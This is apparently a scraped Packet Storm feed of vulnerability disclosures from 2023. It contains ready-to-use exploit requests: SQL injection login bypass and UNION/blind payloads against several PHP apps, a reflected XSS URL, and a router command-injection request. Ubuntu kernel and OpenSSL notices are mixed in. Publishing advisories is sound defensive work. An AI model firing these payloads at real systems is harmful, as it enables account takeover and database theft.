Old Age Home Management version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

## Title: Old Age Home Management-2022-2023-1.0SQLi-Bypass-Authentication-Account-Take-Over## Author: nu11secur1ty## Date: 04.29.2023## Vendor: BY ANUJ KUMAR, https://phpgurukul.com/author/anujk305/## Software: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/#google_vignette## Reference: https://portswigger.net/web-security/sql-injection/lab-login-bypass## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payloads nu11secur1ty' or 1=1# ornu11secur1ty%27+or+1%3D1%23 were each submitted in the usernameparameter. These two requests resulted in different responses,indicating that the input is being incorporated into a SQL query in anunsafe way. The attacker easily can take control over the adminaccount and then everything will be lost for this app and the userswho are using it.STATUS: CRITICAL[+]Exploit:```MYSQLPOST /oahms/admin/login.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvgContent-Length: 62Cache-Control: max-age=0Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/oahms/admin/login.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeusername=nu11secur1ty%27+or+1%3D1%23&password=password&submit=```[+]Responce:```HTTPHTTP/1.1 200 OKDate: Sat, 29 Apr 2023 05:32:07 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0Content-Security-Policy: upgrade-insecure-requests;X-Powered-By: PHP/8.2.0Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 13518<!DOCTYPE html><html lang="en"><head>  <title>Old Age Home Management System|| Dashboard</title>    <link rel="stylesheet" href="vendors/typicons/typicons.css">  <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css">  <link rel="stylesheet" href="css/vertical-layout-light/style.css">  </head>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0)## Proof and Exploit[href](https://streamable.com/qtj0bz)## Time spend:00:30:00

Old Age Home Management 1.0 SQL Injection

Chitor CMS version 1.1.2 suffers from a remote SQL injection vulnerability. The rollno parameter is also susceptible to SQL injection. Original discovery of this finding is attributed to msd0pe in April of 2023.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://github.com/waqaskanju/Chitor-CMS                                   ││  Vendor   : Waqas Ahmad                                                                ││  Software : Chitor-CMS 1.1.2                                                           ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /dmc.phphttps://website/dmc.php?rollno=[SQLI]&submit=GET parameter 'rollno' is vulnerable to SQLI[+] Starting the Attack---Parameter: rollno (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: rollno=(SELECT (CASE WHEN (8157=8157) THEN 123 ELSE (SELECT 6602 UNION SELECT 8316) END))&submit=1    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: rollno=123 AND (SELECT 1046 FROM (SELECT(SLEEP(5)))WFHu)&submit=1    Type: UNION query    Title: Generic UNION query (NULL) - 6 columns    Payload: rollno=123 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627871,0x795671465a5a414e7252507a55426e644b53514b45556c7a554f73727674517276705877617a5541,0x71627a7171),NULL,NULL,NULL-- -&submit=1---[INFO] the back-end DBMS is MySQLweb application technology: PHPback-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[INFO] fetching current databasecurrent database: '***0611***_chitor_db'[-] Done

Chitor CMS 1.1.2 SQL Injection

Aigital Wireless-N Repeater version Mini_Router.0.131229 suffers from a login bypass vulnerability.

    # Exploit Title: Aigital Wireless-N Repeater - Login Bypass# Exploit Author: Matteo Mandolini# Date : 13/04/2023# Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/# Version: Mini_Router.0.131229Login bypassThe device web application relies on a time-based mechanism to manage authentications. From the moment a legitimate user logs into the application with his or her credentials, any other user who can reach the web application is able to bypass the login and directly access the application's functionalities until the legitimate user's session expires.

Aigital Wireless-N Repeater Mini_Router.0.131229 Authentication Bypass

Ubuntu Security Notice 6046-1 - It was discovered that OpenSSL-ibmca incorrectly handled certain RSA decryption. An attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6046-1  
April 27, 2023

openssl-ibmca vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

OpenSSL-ibmca could be made to expose sensitive information.

Software Description:  
- openssl-ibmca: libica based hardware acceleration engine for OpenSSL

Details:

It was discovered that OpenSSL-ibmca incorrectly handled certain RSA decryption.  
An attacker could possibly use this issue to expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  openssl-ibmca                   2.3.0-0ubuntu1.1

Ubuntu 22.04 LTS:  
  openssl-ibmca                   2.2.3-0ubuntu1.1

Ubuntu 20.04 LTS:  
  openssl-ibmca                   2.1.0-0ubuntu1.20.04.2

Ubuntu 18.04 LTS:  
  openssl-ibmca                   1.4.1-0ubuntu1.2

Ubuntu 16.04 ESM:  
  openssl-ibmca                   1.3.0-0ubuntu2.16.04.3

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6046-1  
  https://launchpad.net/bugs/2015454

Package Information:  
  https://launchpad.net/ubuntu/+source/openssl-ibmca/2.3.0-0ubuntu1.1  
  https://launchpad.net/ubuntu/+source/openssl-ibmca/2.2.3-0ubuntu1.1  
  https://launchpad.net/ubuntu/+source/openssl-ibmca/2.1.0-0ubuntu1.20.04.2  
  https://launchpad.net/ubuntu/+source/openssl-ibmca/1.4.1-0ubuntu1.2

Ubuntu Security Notice USN-6046-1

ebankIT versions prior to 7 suffer from a denial of service vulnerability.

    CVE-2023-30455[Description]An issue was discovered in ebankIT before version 7.A Denial-of-Service attack is possible through the GET parameterEStatementsIds located on the/Controls/Generic/EBMK/Handlers/EStatements/DownloadEStatement.ashx endpoint.The GET parameter accepts over 100 comma-separated e-statement IDswithout throwing an error. When this many IDs are supplied, the servertakes around 60 seconds to respond and successfully generate theexpected ZIP archive (during this time period, no other pages load). Athreat actor could issue a request to this endpoint with 100+ statementIDs every 30 seconds, potentially resulting in an overload of theserver for all users.------------------------------------------[VulnerabilityType Other]Denial of Service------------------------------------------[Vendor of Product]ebankIT------------------------------------------[Affected Product Code Base]ebankIT - Omnichannel Digital Banking Platform - Version 6, patched in version 7------------------------------------------[Affected Component]The endpoint existing at /Controls/Generic/EBMK/Handlers/EStatements/DownloadEStatement.ashx?EStatementsIds=*id*,*id*,*id*,etc------------------------------------------[Attack Type]Remote------------------------------------------[Impact Denial of Service]true------------------------------------------[Attack Vectors]I discovered it was possible to perform a Denial-of-Service attack onthe ebankIT platform, potentially resulting in a single user renderingthe entire application inaccessible. The vulnerable endpoint exists on/Controls/Generic/EBMK/Handlers/EStatements/DownloadEStatement.ashxand the EStatementsIds GET parameter accepts over 100comma-separated e-statement IDs without throwing an error. When thismany IDs are supplied, the server takes around 60 seconds to respondand successfully generate the expected zip file (during this 60seconds, no other pages load). A threat actor could issue a request tothis endpoint with 100+ statement ID s every 30 seconds, potentiallyresulting in overloading the server for all users of the ebankITplatform. I believe this is being caused by a thread commitment issuewhere there are no dedicated threads to individual processes.------------------------------------------[Discoverer]Jake Murphy

ebankIT 6 Denial Of Service

ebankIT versions prior to 7 suffer from a cross site scripting vulnerability.

CVE-2023-30454

[Description]  
An issue was discovered in ebankIT before version 7.  
Document Object Model based XSS exists within the  
/Security/Transactions/Transactions.aspx  
endpoint. Users can supply their own JavaScript within the  
ctl100$ctl00MainContent$TransactionMainContent$accControl$hdnAccountsArray  
POST parameter that will be passed to an eval() function and executed  
upon pressing the continue button.

------------------------------------------

[Vulnerability Type]  
Cross Site Scripting (XSS)

------------------------------------------

[Vendor of Product]  
ebankIT

------------------------------------------

[Affected Product Code Base]  
ebankIT - Omnichannel Digital Banking Platform - Version 6, patched in version 7

------------------------------------------

[Affected Component]  
The endpoint existing at: /Security/Transactions/Transactions.aspx

------------------------------------------

[Attack Type]  
Remote

------------------------------------------

[Impact Code execution]  
true

------------------------------------------

[Attack Vectors]  
I discovered a Document Object Model-based Cross-Site Scripting issue  
within the ebankIT platform. While manually inspecting the client-side  
JavaScript code I came across the variable JSONText. This variable  
was using the eval function to parse data passed to it through the  
accobj variable. Knowing the eval function evaluates text as  
JavaScript, I proceeded to locate exactly what data was passed to this  
variable. I found that the data could be supplied by a user during a  
Transfer request (on /Security/Transactions/Transactions.aspx), when  
selecting which account to transfer from. To execute this XSS, I  
intercepted our test user s Transfer request, supplied my own custom  
JavaScript alert(4) in the  
ctl100$ctl00MainContent$TransactionMainContent$accControl$hdnAccountsArray  
POST parameter, and pressed the continue button which resulted in  
the payload successfully executing.

------------------------------------------

[Discoverer]  
Jake Murphy

ebankIT 6 Cross Site Scripting

Ubuntu Security Notice 6047-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel did not properly perform filter deactivation in some situations. A local attacker could possibly use this to gain elevated privileges. Please note that with the fix for this CVE, kernel support for the TCINDEX classifier has been removed.

    ==========================================================================Ubuntu Security Notice USN-6047-1April 27, 2023linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-4.15,linux-azure-5.4, linux-gcp, linux-gcp-4.15, linux-gcp-5.4, linux-gke,linux-gkeop, linux-hwe, linux-hwe-5.4, linux-ibm, linux-kvm, linux-oracle,linux-oracle-5.4 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:The system could be made to run programs as an administrator.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:It was discovered that the Traffic-Control Index (TCINDEX) implementationin the Linux kernel did not properly perform filter deactivation in somesituations. A local attacker could possibly use this to gain elevatedprivileges. Please note that with the fix for this CVE, kernel support forthe TCINDEX classifier has been removed.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1048-ibm      5.4.0-1048.53   linux-image-5.4.0-1068-gkeop    5.4.0-1068.72   linux-image-5.4.0-1090-kvm      5.4.0-1090.96   linux-image-5.4.0-1098-gke      5.4.0-1098.105   linux-image-5.4.0-1100-oracle   5.4.0-1100.109   linux-image-5.4.0-1101-aws      5.4.0-1101.109   linux-image-5.4.0-1104-gcp      5.4.0-1104.113   linux-image-5.4.0-1107-azure    5.4.0-1107.113   linux-image-5.4.0-148-generic   5.4.0-148.165   linux-image-5.4.0-148-generic-lpae  5.4.0-148.165   linux-image-5.4.0-148-lowlatency  5.4.0-148.165   linux-image-aws-lts-20.04       5.4.0.1101.98   linux-image-azure-lts-20.04     5.4.0.1107.100   linux-image-gcp-lts-20.04       5.4.0.1104.106   linux-image-generic             5.4.0.148.146   linux-image-generic-hwe-18.04   5.4.0.148.146   linux-image-generic-hwe-18.04-edge  5.4.0.148.146   linux-image-generic-lpae        5.4.0.148.146   linux-image-generic-lpae-hwe-18.04  5.4.0.148.146   linux-image-generic-lpae-hwe-18.04-edge  5.4.0.148.146   linux-image-gke                 5.4.0.1098.103   linux-image-gke-5.4             5.4.0.1098.103   linux-image-gkeop               5.4.0.1068.66   linux-image-gkeop-5.4           5.4.0.1068.66   linux-image-ibm                 5.4.0.1048.74   linux-image-ibm-lts-20.04       5.4.0.1048.74   linux-image-kvm                 5.4.0.1090.84   linux-image-lowlatency          5.4.0.148.146   linux-image-oem                 5.4.0.148.146   linux-image-oem-osp1            5.4.0.148.146   linux-image-oracle-lts-20.04    5.4.0.1100.93   linux-image-virtual             5.4.0.148.146Ubuntu 18.04 LTS:   linux-image-4.15.0-1118-oracle  4.15.0-1118.129   linux-image-4.15.0-1139-kvm     4.15.0-1139.144   linux-image-4.15.0-1149-gcp     4.15.0-1149.165   linux-image-4.15.0-1164-azure   4.15.0-1164.179   linux-image-4.15.0-210-generic  4.15.0-210.221   linux-image-4.15.0-210-generic-lpae  4.15.0-210.221   linux-image-4.15.0-210-lowlatency  4.15.0-210.221   linux-image-5.4.0-1100-oracle   5.4.0-1100.109~18.04.1   linux-image-5.4.0-1101-aws      5.4.0-1101.109~18.04.1   linux-image-5.4.0-1104-gcp      5.4.0-1104.113~18.04.1   linux-image-5.4.0-1107-azure    5.4.0-1107.113~18.04.1   linux-image-5.4.0-148-generic   5.4.0-148.165~18.04.1   linux-image-5.4.0-148-generic-lpae  5.4.0-148.165~18.04.1   linux-image-5.4.0-148-lowlatency  5.4.0-148.165~18.04.1   linux-image-aws                 5.4.0.1101.79   linux-image-azure               5.4.0.1107.80   linux-image-azure-lts-18.04     4.15.0.1164.132   linux-image-gcp                 5.4.0.1104.80   linux-image-gcp-lts-18.04       4.15.0.1149.163   linux-image-generic             4.15.0.210.193   linux-image-generic-hwe-18.04   5.4.0.148.165~18.04.119   linux-image-generic-lpae        4.15.0.210.193   linux-image-generic-lpae-hwe-18.04  5.4.0.148.165~18.04.119   linux-image-kvm                 4.15.0.1139.130   linux-image-lowlatency          4.15.0.210.193   linux-image-lowlatency-hwe-18.04  5.4.0.148.165~18.04.119   linux-image-oem                 5.4.0.148.165~18.04.119   linux-image-oem-osp1            5.4.0.148.165~18.04.119   linux-image-oracle              5.4.0.1100.109~18.04.72   linux-image-oracle-lts-18.04    4.15.0.1118.123   linux-image-snapdragon-hwe-18.04  5.4.0.148.165~18.04.119   linux-image-virtual             4.15.0.210.193   linux-image-virtual-hwe-18.04   5.4.0.148.165~18.04.119Ubuntu 16.04 ESM:   linux-image-4.15.0-1118-oracle  4.15.0-1118.129~16.04.1   linux-image-4.15.0-1149-gcp     4.15.0-1149.165~16.04.1   linux-image-4.15.0-1164-azure   4.15.0-1164.179~16.04.1   linux-image-4.15.0-210-generic  4.15.0-210.221~16.04.1   linux-image-4.15.0-210-lowlatency  4.15.0-210.221~16.04.1   linux-image-azure               4.15.0.1164.148   linux-image-gcp                 4.15.0.1149.139   linux-image-generic-hwe-16.04   4.15.0.210.195   linux-image-gke                 4.15.0.1149.139   linux-image-lowlatency-hwe-16.04  4.15.0.210.195   linux-image-oem                 4.15.0.210.195   linux-image-oracle              4.15.0.1118.99   linux-image-virtual-hwe-16.04   4.15.0.210.195Ubuntu 14.04 ESM:   linux-image-4.15.0-1164-azure   4.15.0-1164.179~14.04.1   linux-image-azure               4.15.0.1164.130After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6047-1   CVE-2023-1829Package Information:   https://launchpad.net/ubuntu/+source/linux/5.4.0-148.165   https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1101.109   https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1107.113   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1104.113   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1098.105   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1068.72   https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1048.53   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1090.96   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1100.109   https://launchpad.net/ubuntu/+source/linux/4.15.0-210.221   https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1101.109~18.04.1   https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1164.179   https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1107.113~18.04.1   https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1149.165   https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1104.113~18.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-148.165~18.04.1   https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1139.144   https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1118.129   https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1100.109~18.04.1

Ubuntu Security Notice USN-6047-1

Aigital Wireless-N Repeater version Mini_Router.0.131229 suffers from a remote command execution vulnerability.

    # Exploit Title: Aigital Wireless-N Repeater - Command Injection# Exploit Author: Matteo Mandolini# Date : 13/04/2023# Vendor Homepage: https://web.archive.org/web/20220625053314/https://www.aigital.com/# Version: Mini_Router.0.131229Command InjectionPOST /boafrm/formSysCmd HTTP/1.1Host: 192.168.10.253User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 31Origin: http://192.168.10.253Connection: closeReferer: http://192.168.10.253/setok.htmUpgrade-Insecure-Requests: 1sysCmd=ping+-c10+192.168.10.101

Aigital Wireless-N Repeater Mini_Router.0.131229 Remote Command Execution

CreativeItem Academy Learning Management System version 5.14 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : creativeitem.com                                                           ││  Vendor   : CreativeItem                                                               ││  Software : CreativeItem - Academy Learning Management System 5.14                     ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'sort_by' is vulnerable to RXSSPath: /academy/home/courseshttps://demo.creativeitem.com/academy/home/courses?category=photoshop&price=paid&level=beginner&language=arabic&rating=2&sort_by=newestbezzi%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebrmil[-] Done

CreativeItem Academy Learning Management System 5.14 Cross Site Scripting

Piwigo version 13.5.0 suffers from a remote SQL injection vulnerability.

=====[ Tempest Security Intelligence - ADV-03/2023  
]==========================

Piwigo - Version 13.5.0

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================  
 * Overview  
 * Detailed description  
 * Timeline of disclosure  
 * Thanks & Acknowledgments  
 * References

=====[ Vulnerability  
Information]=============================================  
 * Class: improper Neutralization of Special Elements used in an SQL Command  
('SQL injection') [CWE-89] improper Neutralization of Special Elements used  
in an SQL Command ('SQL Injection')  
 * CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
 * CVE-2023-26876

=====[ Overview]========================================================  
 * System affected : Piwigo - Version 13.5.0  
 * Software Version : Version 13.5.0 (other versions may also be affected).  
 * Impact : Piwigo 13.5.0 is vulnerable to SQL injection via  
/filter_user_id parameter to the  
admin.php?page=history&filter_image_id=&filter_user_id endpoint. An  
attacker can exploit this by  
executing SQL injection code to retrieve sensitive (P1) information and  
performing unintended actions.

=====[ Detailed  
description]=================================================

An authenticated user could run SQLi commands in the application and  
retrieve sensitive information (P1) and database information. Using the  
endpoint  
http://localhost/admin.php?page=history&filter_image_id=&filter_user_id. To  
explore just execute the following request:

GET  
/piwigo/admin.php?page=history&filter_image_id=v3cna&filder_user_id=1%20UNION%20ALL%20SELECT  
%20CONCAT(0x4141414141,IFNULL(CAST(VERSION()%20AS%20NCHAR),0x20),0x4141414141)--%20--  
HTTP/1.1  
Host: localhost  
Cookie: pwg_id=cookies

Check the value contained in the *filter_image_id* variable at the request  
response.

=====[ Timeline of  
disclosure]===============================================

12/Fev/2023 - Responsible disclosure was initiated with the vendor.

17/Fev/2023 - Piwigo confirmed the issue;

08/Mar/2023 - CVE-2023-26876 was assigned and reserved.

09/Mar/2023 - The vendor fixed the vulnerability SQL Injection.

=====[ Thanks & Acknowledgments]========================================

 * fxo,ravs  
 * Henrique Arcoverde < henrique.arcoverde () tempest.com.br >  
 * Tempest Security Intelligence / Tempest's Pentest Team [3]

=====[ References ]=====================================================

[1][https://cwe.mitre.org/data/definitions/89.html]

[2][https://github.com/Piwigo/Piwigo/issues/1876]

[3][https://www.tempest.com.br|http://www.tempest.com.br/]

[4][https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876]

=====[ EOF ]===========================================================

--

-- 

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter   
informações privilegiadas e confidenciais. Todas as informações aqui   
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a   
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é   
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste   
caso, por favor, notifique o remetente da mesma e destrua imediatamente a   
mensagem.*

*  
*  
*This message is intended solely for the use of its   
addressee and may contain privileged or confidential information. All   
information contained herein shall be treated as confidential and shall not   
be disclosed to any third party without Tempest’s prior written approval.   
If you are not the addressee you should not distribute, copy or file this   
message. In this case, please notify the sender and destroy its contents   
immediately.**  
*  
*  
*

Source

Packet Storm